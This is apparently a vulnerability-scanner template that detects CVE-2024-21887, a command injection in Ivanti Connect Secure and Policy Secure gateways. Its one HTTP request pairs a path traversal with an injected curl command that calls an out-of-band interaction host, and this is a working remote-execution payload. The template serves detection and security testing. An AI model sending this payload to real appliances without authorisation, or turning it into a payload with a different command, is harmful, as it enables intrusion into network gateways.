id: CVE-2024-21887

info:
  name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection
  author: pdresearch, parthmalhotra, iamnoooob
  severity: critical
  description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x)  allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-21887
    cwe-id: CWE-77
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    vendor: ivanti
    product: connect_secure
  tags: cve,cve2024,interactsh,kev,rce,cmdi

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"